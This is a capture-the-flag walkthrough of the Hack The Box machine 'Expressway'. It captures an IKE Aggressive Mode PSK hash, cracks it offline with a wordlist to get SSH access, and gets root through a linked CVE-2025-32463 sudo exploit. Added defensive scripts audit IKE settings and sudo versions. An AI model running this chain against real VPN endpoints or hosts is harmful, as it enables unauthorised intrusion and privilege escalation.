Author: Sierra0117
Enumeration
NMAP
```
❯ nmap -A -sU -p 500 expressway.htb
Starting Nmap 7.95 ( https://nmap.org ) at 2025-09-27 13:38 IST
Nmap scan report for expressway.htb (10.10.11.87)
Host is up (0.24s latency).

PORT     STATE SERVICE VERSION
500/udp  open  isakmp?
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port500-UDP:V=7.95%I=7%D=9/27%Time=68D79BAA%P=x86_64-pc-linux-gnu%r(IPS
SF:EC_START,9C,"1'\xfc\xb08\x10\x9e\x89,\x9aD\xdd\x80\xc5\x8a\x99\x01\x10\
SF:x02\0\0\0\0\0\0\0\0\x9c\r\0\x004\0\0\0\x01\0\0\0\x01\0\0\0\(\x01\x01\0\
SF:x01\0\0\0\x20\x01\x01\0\0\x80\x01\0\x05\x80\x02\0\x02\x80\x04\0\x02\x80
SF:\x03\0\x03\x80\x0b\0\x01\x80\x0c\x0e\x10\r\0\0\x0c\t\0&\x89\xdf\xd6\xb7
SF:\x12\r\0\0\x14\xaf\xca\xd7\x13h\xa1\xf1\xc9k\x86\x96\xfcwW\x01\0\r\0\0\
SF:x18@H\xb7\xd5n\xbc\xe8\x85%\xe7\xde\x7f\0\xd6\xc2\xd3\x80\0\0\0\0\0\0\x
SF:14\x90\xcb\x80\x91>\xbbin\x08c\x81\xb5\xecB{\x1f");
Too many fingerprints match this host to give specific OS details
Network Distance: 2 hops

TRACEROUTE (using port 500/udp)
HOP RTT       ADDRESS
1   207.74 ms 10.10.14.1
2   ... 30

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 140.58 seconds
```
Rustscan
```
❯ rustscan --udp -a expressway.htb
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
To scan or not to scan? That is the question.

[~] The config file is expected to be at "/home/kali/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 10.10.11.87:500
[~] Starting Script(s)
[~] Starting Nmap 7.95 ( https://nmap.org ) at 2025-09-27 13:41 IST
Initiating Ping Scan at 13:41
Scanning 10.10.11.87 [4 ports]
Completed Ping Scan at 13:41, 0.33s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 13:41
Scanning expressway.htb (10.10.11.87) [1 port]
Completed SYN Stealth Scan at 13:41, 0.23s elapsed (1 total ports)
Nmap scan report for expressway.htb (10.10.11.87)
Host is up, received reset ttl 63 (0.30s latency).
Scanned at 2025-09-27 13:41:49 IST for 0s

PORT     STATE  SERVICE REASON
500/tcp  closed isakmp  reset ttl 63

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.67 seconds
           Raw packets sent: 5 (196B) | Rcvd: 2 (80B)
```
Ike-Scan
```
❯ sudo ike-scan -A expressway.htb
Starting ike-scan 1.9.6 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)
10.10.11.87	Aggressive Mode Handshake returned HDR=(CKY-R=2f3f8aad79517fc3) SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800) KeyExchange(128 bytes) Nonce(32 bytes) ID(Type=ID_USER_FQDN, Value=ike@expressway.htb) VID=09002689dfd6b712 (XAUTH) VID=afcad71368a1f1c96b8696fc77570100 (Dead Peer Detection v1.0) Hash(20 bytes)

Ending ike-scan 1.9.6: 1 hosts scanned in 0.249 seconds (4.01 hosts/sec). 1 returned handshake; 0 returned notify
```

```
❯ sudo ike-scan -A --pskcrack=ike_handshake.hash expressway.htb
Starting ike-scan 1.9.6 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)
10.10.11.87	Aggressive Mode Handshake returned HDR=(CKY-R=c36ad3d7e366241b) SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800) KeyExchange(128 bytes) Nonce(32 bytes) ID(Type=ID_USER_FQDN, Value=ike@expressway.htb) VID=09002689dfd6b712 (XAUTH) VID=afcad71368a1f1c96b8696fc77570100 (Dead Peer Detection v1.0) Hash(20 bytes)

Ending ike-scan 1.9.6: 1 hosts scanned in 0.338 seconds (2.96 hosts/sec). 1 returned handshake; 0 returned notify
```
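The ike-scan line above is the whole finding in one go: the responder accepts IKEv1 Aggressive Mode with PSK authentication, which hands its PSK-derived hash to any unauthenticated client, and it negotiates 3DES, SHA1 and a 1024-bit MODP group. An auditor reviewing many VPN endpoints wants those properties pulled out of the tool's output automatically rather than read by eye. The following script is an added example, not part of the original writeup or of ike-scan: it parses ike-scan's handshake lines and reports the weak settings. The first host line is the one shown on this page; the second (192.0.2.10, AES/SHA2/modp2048 with certificate auth) is a constructed contrast line whose exact field layout is an assumption about ike-scan's formatting.

```python
import re

# Constructed sample input. Line 2 is the handshake line from this page;
# line 3 is a made-up Main Mode host with a sane proposal for contrast
# (its attribute names follow ike-scan's style but are an assumption).
SAMPLE_OUTPUT = """\
Starting ike-scan 1.9.6 with 2 hosts (http://www.nta-monitor.com/tools/ike-scan/)
10.10.11.87\tAggressive Mode Handshake returned HDR=(CKY-R=2f3f8aad79517fc3) SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800) KeyExchange(128 bytes) Nonce(32 bytes) ID(Type=ID_USER_FQDN, Value=ike@expressway.htb) VID=09002689dfd6b712 (XAUTH) VID=afcad71368a1f1c96b8696fc77570100 (Dead Peer Detection v1.0) Hash(20 bytes)
192.0.2.10\tMain Mode Handshake returned HDR=(CKY-R=0011223344556677) SA=(Enc=AES KeyLength=256 Hash=SHA2-256 Group=14:modp2048 Auth=RSA_Sig LifeType=Seconds LifeDuration=28800)
Ending ike-scan 1.9.6: 2 hosts scanned in 0.300 seconds (6.67 hosts/sec). 2 returned handshake; 0 returned notify
"""

LINE_RE = re.compile(
    r"^(?P<host>\S+)\s+(?P<mode>Aggressive|Main) Mode Handshake returned (?P<rest>.*)$"
)
SA_RE = re.compile(r"SA=\(([^)]*)\)")
ID_RE = re.compile(r"ID\(Type=(?P<type>\w+), Value=(?P<value>[^)]*)\)")

# Algorithms and DH groups that should not appear in a current IKE proposal.
WEAK_ENC = {"DES", "3DES"}
WEAK_HASH = {"MD5", "SHA1"}
WEAK_GROUPS = {"1", "2", "5"}  # modp768, modp1024, modp1536


def parse_ike_scan(output):
    """Turn ike-scan's per-host handshake lines into dicts; skip banner lines."""
    records = []
    for line in output.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        rest = m.group("rest")
        attrs = {}
        sa = SA_RE.search(rest)
        if sa:
            for kv in sa.group(1).split():
                key, _, value = kv.partition("=")
                attrs[key] = value
        idm = ID_RE.search(rest)
        records.append({
            "host": m.group("host"),
            "mode": m.group("mode"),
            "sa": attrs,
            "id": (idm.group("type"), idm.group("value")) if idm else None,
        })
    return records


def audit(record):
    """Return a list of finding tags for one parsed handshake; empty means clean."""
    findings = []
    sa = record["sa"]
    # Aggressive Mode + PSK: the responder's hash is computable offline from
    # what it sends to an unauthenticated initiator.
    if record["mode"] == "Aggressive" and sa.get("Auth") == "PSK":
        findings.append("aggressive-mode-psk")
    if sa.get("Enc") in WEAK_ENC:
        findings.append("weak-enc:" + sa["Enc"])
    if sa.get("Hash") in WEAK_HASH:
        findings.append("weak-hash:" + sa["Hash"])
    group_number = sa.get("Group", "").split(":")[0]
    if group_number in WEAK_GROUPS:
        findings.append("weak-group:" + sa["Group"])
    # In Aggressive Mode the ID payload travels in clear, so the identity is
    # disclosed to anyone who completes the first exchange.
    if record["id"] and record["id"][0] == "ID_USER_FQDN":
        findings.append("identity-disclosed:" + record["id"][1])
    return findings


def audit_output(output):
    """Map each responding host to its list of findings."""
    return {r["host"]: audit(r) for r in parse_ike_scan(output)}


if __name__ == "__main__":
    for host, findings in audit_output(SAMPLE_OUTPUT).items():
        print(host, "OK" if not findings else ", ".join(findings))
```

Feed it the saved stdout of an ike-scan run; a host with no findings prints `OK`. The fix on the responder side is to disable IKEv1 Aggressive Mode (or IKEv1 entirely in favour of IKEv2) and to restrict the proposal to AES, SHA-2 and DH group 14 or stronger.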
Getting The Hash
```
❯ cat ike_handshake.hash
31e160dac095eb3da37094a2955b1aa741d4219c000680ff1ced361641fa63cf18671f51cb3d7cfb738253f0d53f12d21ea543f5d4ea7e3fba4e01560514fd64e57a937f89007129f021eca010b2614d79a1622366c99c2c53057b45ed59c3ac2d5179519357db3829d618fd9dc011fa4c8cb4e7a8e482876ffc966a572f8a62:cf9d3881626018987e3ae3aed67f6356998a8d768725b5709ddf2dc5743320fdf67560ae2928676388b989938f1d33d6d11e694f1a2a18dfc28139700ecab715dd396dc268bebf0fe13a8e8faea5adff25db99bae1d2759a89917c340fd55ce90eab996f919c3112375031de1ecdf2e367244791f52b79167f6c72f3045b31fb:c36ad3d7e366241b:b301188e8cf386b0:00000001000000010000009801010004030000240101000080010005800200028003000180040002800b0001000c000400007080030000240201000080010005800200018003000180040002800b0001000c000400007080030000240301000080010001800200028003000180040002800b0001000c000400007080000000240401000080010001800200018003000180040002800b0001000c000400007080:03000000696b6540657870726573737761792e687462:d8142f082d795ead762da94a4dcbad84f6fe813e:9ca8b616c1dbac3967a443561380077441667d83d5491fe1f9ef9b7322f7b75c:589e0d79745a52455803e5c976c6ccda30893f1c
```
Cracking The Hash
```
❯ psk-crack -d /usr/share/wordlists/rockyou.txt ike_handshake.hash
Starting psk-crack [ike-scan 1.9.6] (http://www.nta-monitor.com/tools/ike-scan/)
Running in dictionary cracking mode
key "freakingrockstarontheroad" matches SHA1 hash 589e0d79745a52455803e5c976c6ccda30893f1c
Ending psk-crack: 8045040 iterations in 7.816 seconds (1029324.27 iterations/sec)
```
NetExec
```
❯ nxc ssh expressway.htb -u 'ike' -p 'freakingrockstarontheroad'
[*] First time use detected
[*] Creating home directory structure
[*] Creating missing folder logs
[*] Creating missing folder modules
[*] Creating missing folder protocols
[*] Creating missing folder workspaces
[*] Creating missing folder obfuscated_scripts
[*] Creating missing folder screenshots
[*] Creating missing folder logs/sam
[*] Creating missing folder logs/lsa
[*] Creating missing folder logs/ntds
[*] Creating missing folder logs/dpapi
[*] Creating default workspace
[*] Initializing FTP protocol database
[*] Initializing LDAP protocol database
[*] Initializing MSSQL protocol database
[*] Initializing NFS protocol database
[*] Initializing RDP protocol database
[*] Initializing SMB protocol database
[*] Initializing SSH protocol database
[*] Initializing VNC protocol database
[*] Initializing WINRM protocol database
[*] Initializing WMI protocol database
[*] Copying default configuration file
SSH         10.10.11.87     22     expressway.htb   [*] SSH-2.0-OpenSSH_10.0p2 Debian-8
SSH         10.10.11.87     22     expressway.htb   [+] ike:freakingrockstarontheroad  Linux - Shell access!
```
User Flag
```
❯ ssh ike@expressway.htb
The authenticity of host 'expressway.htb (10.10.11.87)' can't be established.
ED25519 key fingerprint is SHA256:fZLjHktV7oXzFz9v3ylWFE4BS9rECyxSHdlLrfxRM8g.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'expressway.htb' (ED25519) to the list of known hosts.
ike@expressway.htb's password:
Last login: Sat Sep 27 09:16:47 BST 2025 from 10.10.14.68 on ssh
Linux expressway.htb 6.16.7+deb14-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.16.7-1 (2025-09-11) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sat Sep 27 09:17:19 2025 from 10.10.14.68
ike@expressway:~$ ls
user.txt
ike@expressway:~$ cat user.txt
1bbcd13904xxxxxxxxxxxxxxxxxxxxxxxx
ike@expressway:~$
```
Privilege Escalation
After getting the user flag, I started looking for ways to escalate privileges. During enumeration, linpeas flagged the SUID sudo binaries and suggested checking whether the installed sudo version is vulnerable.
```
╔══════════╣ SUID - Check easy privesc, exploits and write perms
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#sudo-and-suid
strace Not Found
-rwsr-xr-x 1 root root       1.5M Aug 14 12:58 /usr/sbin/exim4
-rwsr-xr-x 1 root root       1023K Aug 29 15:18 /usr/local/bin/sudo  --->  check_if_the_sudo_version_is_vulnerable
-rwsr-xr-x 1 root root       116K Aug 26 22:05 /usr/bin/passwd  --->  Apple_Mac_OSX(03-2006)/Solaris_8/9(12-2004)/SPARC_8/9/Sun_Solaris_2.3_to_2.5.1(02-1997)
-rwsr-xr-x 1 root root       75K Sep  9 10:09 /usr/bin/mount  --->  Apple_Mac_OSX(Lion)_Kernel_xnu-1699.32.7_except_xnu-1699.24.8
-rwsr-xr-x 1 root root       87K Aug 26 22:05 /usr/bin/gpasswd
-rwsr-xr-x 1 root root       91K Sep  9 10:09 /usr/bin/su
-rwsr-xr-x 1 root root       276K Jun 27  2023 /usr/bin/sudo  --->  check_if_the_sudo_version_is_vulnerable
-rwsr-xr-x 1 root root       63K Sep  9 10:09 /usr/bin/umount  --->  BSD/Linux(08-1996)
-rwsr-xr-x 1 root root       70K Aug 26 22:05 /usr/bin/chfn  --->  SuSE_9.3/10
-rwsr-xr-x 1 root root       52K Aug 26 22:05 /usr/bin/chsh
-rwsr-xr-x 1 root root       19K Sep  9 10:09 /usr/bin/newgrp  --->  HP-UX_10.20
-rwsr-xr-- 1 root messagebus 51K Mar  8  2025 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root       483K Aug 10 00:07 /usr/lib/openssh/ssh-keysign
-r-sr-xr-x 1 root root       14K Aug 28 09:04 /usr/lib/vmware-tools/bin32/vmware-user-suid-wrapper
-r-sr-xr-x 1 root root       15K Aug 28 09:04 /usr/lib/vmware-tools/bin64/vmware-user-suid-wrapper
```
```
ike@expressway:~$ sudo -V
Sudo version 1.9.17
Sudoers policy plugin version 1.9.17
Sudoers file grammar version 50
Sudoers I/O plugin version 1.9.17
Sudoers audit plugin version 1.9.17
ike@expressway:~$
```
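Two sudo binaries show up in the SUID list (/usr/bin/sudo from the distro package and a newer /usr/local/bin/sudo), and `sudo -V` reports 1.9.17, which is inside the range affected by CVE-2025-32463 (the chroot-option bug: 1.9.14 up to and including 1.9.17, fixed in 1.9.17p1). The naive check, comparing version strings, gets the patch level wrong because "1.9.17p1" sorts after "1.9.17" only if the `p` suffix is parsed. The script below is an added example, not part of the original writeup: it parses `sudo -V` output into a comparable tuple and reports whether the build is in the affected window, so a fleet check can run it over collected output. The affected range is taken from the public advisory for the CVE; the sample output is the block shown above.

```python
import re
import subprocess

# Constructed sample: the `sudo -V` output from this page, verbatim.
SUDO_V_OUTPUT = """\
Sudo version 1.9.17
Sudoers policy plugin version 1.9.17
Sudoers file grammar version 50
Sudoers I/O plugin version 1.9.17
Sudoers audit plugin version 1.9.17
"""

# CVE-2025-32463 affects sudo 1.9.14 through 1.9.17 inclusive; 1.9.17p1
# carries the fix. Tuples are (major, minor, patch, p-level).
AFFECTED_MIN = (1, 9, 14, 0)
AFFECTED_MAX = (1, 9, 17, 0)

VERSION_RE = re.compile(r"^Sudo version (\d+)\.(\d+)\.(\d+)(?:p(\d+))?\s*$", re.M)


def parse_sudo_version(output):
    """Extract the 'Sudo version X.Y.Zp<N>' line as a 4-tuple; p-level 0 if absent."""
    m = VERSION_RE.search(output)
    if not m:
        raise ValueError("no 'Sudo version' line in input")
    major, minor, patch, plevel = m.groups()
    return (int(major), int(minor), int(patch), int(plevel) if plevel else 0)


def is_affected(version):
    """True if the parsed version falls inside the CVE-2025-32463 window."""
    return AFFECTED_MIN <= version <= AFFECTED_MAX


def format_version(version):
    major, minor, patch, plevel = version
    base = f"{major}.{minor}.{patch}"
    return base if plevel == 0 else f"{base}p{plevel}"


def check_sudo_output(output):
    """Return (version_string, affected) for a captured `sudo -V` output."""
    version = parse_sudo_version(output)
    return format_version(version), is_affected(version)


def check_local_sudo(binary="sudo"):
    """Run `<binary> -V` on this host and check it; binary path is a parameter
    because, as on this box, more than one sudo may be installed."""
    out = subprocess.run([binary, "-V"], capture_output=True, text=True, check=True).stdout
    return check_sudo_output(out)


if __name__ == "__main__":
    version, affected = check_sudo_output(SUDO_V_OUTPUT)
    print(f"sudo {version}: {'AFFECTED by CVE-2025-32463' if affected else 'not affected'}")
```

On a real host run `check_local_sudo("/usr/local/bin/sudo")` as well as the default, since the package manager only tracks the one it installed. The remediation is to upgrade to 1.9.17p1 or later, or to remove the extra locally built binary if it is not needed.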
The exploit used: https://raw.githubusercontent.com/junxian428/CVE-2025-32463/refs/heads/main/priv_esc.sh
After transferring the script to the machine and running it:
```
ike@expressway:~$ ls
priv_esc.sh  user.txt
ike@expressway:~$ chmod u+x priv_esc.sh
ike@expressway:~$ ls
priv_esc.sh  user.txt
ike@expressway:~$ ./priv_esc.sh
woot!
root@expressway:/# ls
bin   dev  home        initrd.img.old  lib64       media  opt   root  sbin  sys  usr  vmlinuz
boot  etc  initrd.img  lib             lost+found  mnt    proc  run   srv   tmp  var  vmlinuz.old
root@expressway:/# cat /root/root.txt
3964e5f8a6c52bxxxxxxxxxxxxxxxxxx
root@expressway:/#
```